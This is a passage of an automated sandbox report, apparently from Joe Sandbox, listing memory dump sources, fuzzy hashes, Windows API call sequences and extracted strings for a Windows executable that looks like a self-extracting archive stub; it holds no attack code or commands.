                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 9ea23a0b5be8d720a81cc3f877502472f5d544f68c9a06fa8112536a0a6d4999
                                                                                                      • Instruction ID: 552194bb4170a1215c8db273fce581fe7e12adf9569c4ff67c8fd7627c2ffaff
                                                                                                      • Opcode Fuzzy Hash: 9ea23a0b5be8d720a81cc3f877502472f5d544f68c9a06fa8112536a0a6d4999
                                                                                                      • Instruction Fuzzy Hash: 20713B7230434D4BDF24DF29E8D4BBD77D9ABA5304F00492DE9868B2C2DB749A84C756
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: a22c7aac1b6055bcdd557d12650c199369b4c00e5c45ed7b86fb984c26859ec4
                                                                                                      • Instruction ID: 012d61c0565bbe841834616db2a520e7c7facec7f9f182bdf37e9fb79915bfb3
                                                                                                      • Opcode Fuzzy Hash: a22c7aac1b6055bcdd557d12650c199369b4c00e5c45ed7b86fb984c26859ec4
                                                                                                      • Instruction Fuzzy Hash: D8819F9221A2D89DC716CFBD3CE12F53EA25773341B1D04BAE5C5C62A3C036869AD721
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 01e37380462b52ab42e50579520b06c8743002b459ddfd5f68bb370bf045edb7
                                                                                                      • Instruction ID: 435bca35de98dfac61b47e1f5f15b47bd44011ea7aeb0c4de193bded5075684d
                                                                                                      • Opcode Fuzzy Hash: 01e37380462b52ab42e50579520b06c8743002b459ddfd5f68bb370bf045edb7
                                                                                                      • Instruction Fuzzy Hash: 7151E33150E3D94ED712CF29818057EBFE6AFDA314F4948AEE5D54B253C230D689CB92
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 53ec5b5e7cac2ae5e221215884ea2cfcb0d1cd3c43417b140ee25955071b4b62
                                                                                                      • Instruction ID: 30bfbea9e4ff4aeaae95b47d3e3b2e8133ddccae96b736bfd069d19e945261b3
                                                                                                      • Opcode Fuzzy Hash: 53ec5b5e7cac2ae5e221215884ea2cfcb0d1cd3c43417b140ee25955071b4b62
                                                                                                      • Instruction Fuzzy Hash: 99512571A083068FC748CF19D49059AF7E1FF88314F058A2EE899A7741DB34EA59CB96
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 03d8200d211fb2155360bb18f1da6528e951efe338ec765a37701bdcb59cc893
                                                                                                      • Instruction ID: af7748c747c73bd18b3ed9a756b422446c30beda28ce33b00d76eae438b481bc
                                                                                                      • Opcode Fuzzy Hash: 03d8200d211fb2155360bb18f1da6528e951efe338ec765a37701bdcb59cc893
                                                                                                      • Instruction Fuzzy Hash: D631E1B16047498FCB14DF28D89536EBBE0FB96704F00892DE4DAD7781C678E909CB52
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: bd86cd6b3aa6aaa3f520b7ccd3bbd9e259104a2bb37cd7c3e0e1b6efe53c461b
                                                                                                      • Instruction ID: 240938ab69ce4aeda0846c1822183330ea206e86af2336d30c8ab2fe5112ad23
                                                                                                      • Opcode Fuzzy Hash: bd86cd6b3aa6aaa3f520b7ccd3bbd9e259104a2bb37cd7c3e0e1b6efe53c461b
                                                                                                      • Instruction Fuzzy Hash: 1321DA72A201655BCB1CCF6DECA443A7355A78E301787813BEB468B2D1C635E927CBE0
                                                                                                      APIs
                                                                                                      • ___free_lconv_mon.LIBCMT ref: 00A195D1
                                                                                                        • Part of subcall function 00A1916C: _free.LIBCMT ref: 00A19189
                                                                                                        • Part of subcall function 00A1916C: _free.LIBCMT ref: 00A1919B
                                                                                                        • Part of subcall function 00A1916C: _free.LIBCMT ref: 00A191AD
                                                                                                        • Part of subcall function 00A1916C: _free.LIBCMT ref: 00A191BF
                                                                                                        • Part of subcall function 00A1916C: _free.LIBCMT ref: 00A191D1
                                                                                                        • Part of subcall function 00A1916C: _free.LIBCMT ref: 00A191E3
                                                                                                        • Part of subcall function 00A1916C: _free.LIBCMT ref: 00A191F5
                                                                                                        • Part of subcall function 00A1916C: _free.LIBCMT ref: 00A19207
                                                                                                        • Part of subcall function 00A1916C: _free.LIBCMT ref: 00A19219
                                                                                                        • Part of subcall function 00A1916C: _free.LIBCMT ref: 00A1922B
                                                                                                        • Part of subcall function 00A1916C: _free.LIBCMT ref: 00A1923D
                                                                                                        • Part of subcall function 00A1916C: _free.LIBCMT ref: 00A1924F
                                                                                                        • Part of subcall function 00A1916C: _free.LIBCMT ref: 00A19261
                                                                                                      • _free.LIBCMT ref: 00A195C6
                                                                                                        • Part of subcall function 00A159C2: RtlFreeHeap.NTDLL(00000000,00000000,?,00A19301,?,00000000,?,00000000,?,00A19328,?,00000007,?,?,00A19725,?), ref: 00A159D8
                                                                                                        • Part of subcall function 00A159C2: GetLastError.KERNEL32(?,?,00A19301,?,00000000,?,00000000,?,00A19328,?,00000007,?,?,00A19725,?,?), ref: 00A159EA
                                                                                                      • _free.LIBCMT ref: 00A195E8
                                                                                                      • _free.LIBCMT ref: 00A195FD
                                                                                                      • _free.LIBCMT ref: 00A19608
                                                                                                      • _free.LIBCMT ref: 00A1962A
                                                                                                      • _free.LIBCMT ref: 00A1963D
                                                                                                      • _free.LIBCMT ref: 00A1964B
                                                                                                      • _free.LIBCMT ref: 00A19656
                                                                                                      • _free.LIBCMT ref: 00A1968E
                                                                                                      • _free.LIBCMT ref: 00A19695
                                                                                                      • _free.LIBCMT ref: 00A196B2
                                                                                                      • _free.LIBCMT ref: 00A196CA
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                      • String ID:
                                                                                                      • API String ID: 161543041-0
                                                                                                      • Opcode ID: bfbe270f2b1dec5d953dced602fe7dce8d96140f1e0eb9edb8b22b423d423652
                                                                                                      • Instruction ID: f3f166aec3cb824f6ee85a60d4e09e65957430488e317d64893f75afaefb43e1
                                                                                                      • Opcode Fuzzy Hash: bfbe270f2b1dec5d953dced602fe7dce8d96140f1e0eb9edb8b22b423d423652
                                                                                                      • Instruction Fuzzy Hash: 49314871A04701EFEF21AB38D955BDB73E9AF41360F148469E4A9D7191DE35ACC0CB22
                                                                                                      APIs
                                                                                                      • GetWindow.USER32(?,00000005), ref: 00A0B8DD
                                                                                                      • GetClassNameW.USER32(00000000,?,00000800), ref: 00A0B90C
                                                                                                        • Part of subcall function 00A00B12: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,009FAC49,?,?,?,009FABF8,?,-00000002,?,00000000,?), ref: 00A00B28
                                                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00A0B92A
                                                                                                      • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 00A0B941
                                                                                                      • GetObjectW.GDI32(00000000,00000018,?), ref: 00A0B954
                                                                                                        • Part of subcall function 00A08B22: GetDC.USER32(00000000), ref: 00A08B2E
                                                                                                        • Part of subcall function 00A08B22: GetDeviceCaps.GDI32(00000000,0000005A), ref: 00A08B3D
                                                                                                        • Part of subcall function 00A08B22: ReleaseDC.USER32(00000000,00000000), ref: 00A08B4B
                                                                                                        • Part of subcall function 00A08ADF: GetDC.USER32(00000000), ref: 00A08AEB
                                                                                                        • Part of subcall function 00A08ADF: GetDeviceCaps.GDI32(00000000,00000058), ref: 00A08AFA
                                                                                                        • Part of subcall function 00A08ADF: ReleaseDC.USER32(00000000,00000000), ref: 00A08B08
                                                                                                      • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 00A0B97B
                                                                                                      • DeleteObject.GDI32(00000000), ref: 00A0B982
                                                                                                      • GetWindow.USER32(00000000,00000002), ref: 00A0B98B
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$CapsDeviceMessageObjectReleaseSend$ClassCompareDeleteLongNameString
                                                                                                      • String ID: STATIC
                                                                                                      • API String ID: 1444658586-1882779555
                                                                                                      • Opcode ID: f7a88a701e4cc6f97ed8bff0c2400cfea2be9f59f1a25ca16f1b1b817aeb4c5a
                                                                                                      • Instruction ID: 7c180065fcd4bc050dee7bf5ce71899a76762c4a4e6b5d193691b4622adc5620
                                                                                                      • Opcode Fuzzy Hash: f7a88a701e4cc6f97ed8bff0c2400cfea2be9f59f1a25ca16f1b1b817aeb4c5a
                                                                                                      • Instruction Fuzzy Hash: 9421F6726506187BE730ABA8EE4AFAE762CEF14780F004021FA02A51D1CB648D0386F6
                                                                                                      APIs
                                                                                                      • _free.LIBCMT ref: 00A1623F
                                                                                                        • Part of subcall function 00A159C2: RtlFreeHeap.NTDLL(00000000,00000000,?,00A19301,?,00000000,?,00000000,?,00A19328,?,00000007,?,?,00A19725,?), ref: 00A159D8
                                                                                                        • Part of subcall function 00A159C2: GetLastError.KERNEL32(?,?,00A19301,?,00000000,?,00000000,?,00A19328,?,00000007,?,?,00A19725,?,?), ref: 00A159EA
                                                                                                      • _free.LIBCMT ref: 00A1624B
                                                                                                      • _free.LIBCMT ref: 00A16256
                                                                                                      • _free.LIBCMT ref: 00A16261
                                                                                                      • _free.LIBCMT ref: 00A1626C
                                                                                                      • _free.LIBCMT ref: 00A16277
                                                                                                      • _free.LIBCMT ref: 00A16282
                                                                                                      • _free.LIBCMT ref: 00A1628D
                                                                                                      • _free.LIBCMT ref: 00A16298
                                                                                                      • _free.LIBCMT ref: 00A162A6
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                      • String ID:
                                                                                                      • API String ID: 776569668-0
                                                                                                      • Opcode ID: 89c591ce666475a5e2ed44b98a31a859fcfdd966ea9aa5e0b7be5d4a73c7af70
                                                                                                      • Instruction ID: fcddc8c0619b426ddfc3a1ae18160fdad9b3e11b159eaaa6e78882a392193b21
                                                                                                      • Opcode Fuzzy Hash: 89c591ce666475a5e2ed44b98a31a859fcfdd966ea9aa5e0b7be5d4a73c7af70
                                                                                                      • Instruction Fuzzy Hash: 17118975A10608FFCF01EF64CA42CDD3B65FF453A0B5145A5F9888F122DA31DE909B41
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: ;%u$x%u$xc%u
                                                                                                      • API String ID: 0-2277559157
                                                                                                      • Opcode ID: c3c51edb11157907299432b92dec0c19b0e127d10e82fc482f428be59cb29e5e
                                                                                                      • Instruction ID: f5a5c30aab4ff7837e54f08a76c184f794caa4589fd397436d63c82e4c2d55be
                                                                                                      • Opcode Fuzzy Hash: c3c51edb11157907299432b92dec0c19b0e127d10e82fc482f428be59cb29e5e
                                                                                                      • Instruction Fuzzy Hash: 5CF136B160838C9BDB14EB648995BFE7799AFD0300F084569FB86DF283CA64D944C762
                                                                                                      APIs
                                                                                                        • Part of subcall function 009F12E7: GetDlgItem.USER32(00000000,00003021), ref: 009F132B
                                                                                                        • Part of subcall function 009F12E7: SetWindowTextW.USER32(00000000,00A202E4), ref: 009F1341
                                                                                                      • EndDialog.USER32(?,00000001), ref: 00A099AF
                                                                                                      • SendMessageW.USER32(?,00000080,00000001,?), ref: 00A099DC
                                                                                                      • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 00A099F1
                                                                                                      • SetWindowTextW.USER32(?,?), ref: 00A09A02
                                                                                                      • GetDlgItem.USER32(?,00000065), ref: 00A09A0B
                                                                                                      • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00A09A1F
                                                                                                      • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00A09A31
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$Item$TextWindow$Dialog
                                                                                                      • String ID: LICENSEDLG
                                                                                                      • API String ID: 3214253823-2177901306
                                                                                                      • Opcode ID: 2f34e4d2d0c27bc9b9e16b5e65a1ffdfdc39aad0773231e7b0b8c03a8a753de4
                                                                                                      • Instruction ID: 63d3d4b9d2c477fc63b270374a2fa5f2e9603a7c722ab1ba8505b9df2935503e
                                                                                                      • Opcode Fuzzy Hash: 2f34e4d2d0c27bc9b9e16b5e65a1ffdfdc39aad0773231e7b0b8c03a8a753de4
                                                                                                      • Instruction Fuzzy Hash: B621A6312001087FD6219BA5FE45E7B3B6DEB9ABD4F014018F640A21E2CA669C13D672
                                                                                                      APIs
                                                                                                      • __EH_prolog.LIBCMT ref: 009F9232
                                                                                                      • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 009F9255
                                                                                                      • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 009F9274
                                                                                                        • Part of subcall function 00A00B12: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,009FAC49,?,?,?,009FABF8,?,-00000002,?,00000000,?), ref: 00A00B28
                                                                                                      • _swprintf.LIBCMT ref: 009F9310
                                                                                                        • Part of subcall function 009F3F5B: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 009F3F6E
                                                                                                      • MoveFileW.KERNEL32(?,?), ref: 009F9385
                                                                                                      • MoveFileW.KERNEL32(?,?), ref: 009F93C1
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf
                                                                                                      • String ID: rtmp%d
                                                                                                      • API String ID: 2111052971-3303766350
                                                                                                      • Opcode ID: 186b1b67926282fde9037ac50b3a5189eb3321206597d57eba1a05d1ee6e9c7c
                                                                                                      • Instruction ID: ab26fce0a1c907c00f7cb6d72ce2b56f22c6ed40f48bd44add8632eb6226a78f
                                                                                                      • Opcode Fuzzy Hash: 186b1b67926282fde9037ac50b3a5189eb3321206597d57eba1a05d1ee6e9c7c
                                                                                                      • Instruction Fuzzy Hash: 0E415C7291125DAADF21FBA4CD95FFE777CAF85384F0040A5B605A3082EA749B49CF60
                                                                                                      APIs
                                                                                                      • GlobalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,?,?,?,?,00A08705,?), ref: 00A07FBA
                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,-00000003,00000000,00000000), ref: 00A07FDB
                                                                                                      • CreateStreamOnHGlobal.COMBASE(00000000,00000001,00000000), ref: 00A08002
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Global$AllocByteCharCreateMultiStreamWide
                                                                                                      • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                                                                      • API String ID: 4094277203-4209811716
                                                                                                      • Opcode ID: f5b73f6770c20a00eaf594f7c0942fe7cd789b6556cb979500660b56abefb550
                                                                                                      • Instruction ID: caa2dfdf535d2916a9acb65044f9cc80123dbd6b4c6b21c4e0a30899b774c325
                                                                                                      • Opcode Fuzzy Hash: f5b73f6770c20a00eaf594f7c0942fe7cd789b6556cb979500660b56abefb550
                                                                                                      • Instruction Fuzzy Hash: 2E316A3150831A7FD324AB68AC06FAFB798DF56320F10462DF510961C2EFB4A859C7A5
                                                                                                      APIs
                                                                                                      • GetTickCount.KERNEL32 ref: 00A07DAF
                                                                                                      • GetTickCount.KERNEL32 ref: 00A07DCD
                                                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00A07DE3
                                                                                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00A07DF7
                                                                                                      • TranslateMessage.USER32(?), ref: 00A07E02
                                                                                                      • DispatchMessageW.USER32(?), ref: 00A07E0D
                                                                                                      • ShowWindow.USER32(?,00000005,?,00000000,?,?,?,?,00000000,00000000,00000000,<html>,00000006), ref: 00A07EBD
                                                                                                      • SetWindowTextW.USER32(?,00000000), ref: 00A07EC7
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Message$CountTickWindow$DispatchPeekShowTextTranslate
                                                                                                      • String ID:
                                                                                                      • API String ID: 4150546248-0
                                                                                                      • Opcode ID: a208bee9b83cbaa354342b4993f192de219168eb276a75c656baf4bc169cb928
                                                                                                      • Instruction ID: 44afc2a0ba3438efa816d0b90bcef90f6b5c11d12a8ad7b384b8767947c80918
                                                                                                      • Opcode Fuzzy Hash: a208bee9b83cbaa354342b4993f192de219168eb276a75c656baf4bc169cb928
                                                                                                      • Instruction Fuzzy Hash: F4416E7160830AAFD710DFA9D884D2B77E9EF98705B00086DF545C7190DB71EC46CB62
                                                                                                      APIs
                                                                                                      • __aulldiv.LIBCMT ref: 009FFE33
                                                                                                        • Part of subcall function 009FA8E0: GetVersionExW.KERNEL32(?), ref: 009FA905
                                                                                                      • FileTimeToLocalFileTime.KERNEL32(?,?,00000000,?,00000064,00000000,?,00000000,?), ref: 009FFE5C
                                                                                                      • FileTimeToSystemTime.KERNEL32(?,?,00000000,?,00000064,00000000,?,00000000,?), ref: 009FFE6E
                                                                                                      • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 009FFE7B
                                                                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 009FFE91
                                                                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 009FFE9D
                                                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 009FFED3
                                                                                                      • __aullrem.LIBCMT ref: 009FFF5D
                                                                                                      Memory Dump Source
